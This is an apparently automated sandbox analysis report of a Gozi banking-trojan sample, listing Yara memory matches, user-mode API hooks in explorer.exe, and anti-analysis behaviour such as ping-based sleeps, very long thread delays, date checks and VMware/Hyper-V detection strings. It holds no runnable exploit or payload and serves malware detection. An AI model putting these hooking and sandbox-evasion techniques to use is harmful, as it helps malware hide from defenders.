Source: Yara match	File source: 00000008.00000003.405030349.000000000320C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392542209.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.395416668.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.672170468.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000002.673705435.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.543904492.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 5696, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 5676, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4364, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4084, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4176, type: MEMORYSTR
Source: Yara match	File source: 8.3.RegAsm.exe.330a4a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.RegAsm.exe.330a4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.RegAsm.exe.33b8f40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.RegAsm.exe.33894a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000024.00000000.539555209.0000020FDEA80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000000.652250920.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.568184534.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.609566601.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.468518313.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.523377381.000000000308F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.563482706.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.615563963.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000000.655957739.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000000.648045274.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.470699283.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.537792307.0000020FDEA80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.572793373.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.398744797.0000000003389000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.472358807.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.535827896.0000020FDEA80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.824135960.00000163C5171000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000002.819337222.000001EAE4571000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.621795530.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.542236121.0000000000E51000.00000020.00020000.sdmp, type: MEMORY

Hooks registry keys query functions (used to hide registry keys)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW

Modifies the export address table of user mode modules (user mode EAT hooks)

Source: explorer.exe

IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFC8BAF521C

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00

Modifies the import address table of user mode modules (user mode IAT hooks)

Source: explorer.exe

EAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFC8BAF5200

Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: powershell.exe PID: 6536, type: MEMORYSTR

Uses ping.exe to sleep

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\gozi.exe TID: 6140	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe TID: 7076	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3540	Thread sleep count: 59 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3540	Thread sleep count: 78 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3540	Thread sleep count: 41 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3540	Thread sleep count: 93 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1304	Thread sleep time: -90000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2268	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior

Found evasive API chain (date check)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Windows\SysWOW64\cmd.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\gozi.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4982			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4237			Jump to behavior

Found large amount of non-executed APIs

Source: C:\Windows\SysWOW64\cmd.exe

API coverage: 3.9 %

Found dropped PE file which has not been started or loaded

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\5n300s0s.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\hscan34n.dll			Jump to dropped file

Source: C:\Users\user\Desktop\gozi.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

8_2_03F18409

Source: explorer.exe, 0000001F.00000000.495166406.00000000086C9000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001F.00000000.521666713.0000000008778000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
Source: explorer.exe, 0000001F.00000000.495166406.00000000086C9000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
Source: RuntimeBroker.exe, 00000029.00000000.614665708.00000163C4E00000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001F.00000000.487973669.00000000067C2000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
Source: mshta.exe, 00000012.00000002.422959033.000002BC06C24000.00000004.00000001.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001F.00000000.495166406.00000000086C9000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: gozi.exe, 00000002.00000002.327636838.000000000153E000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

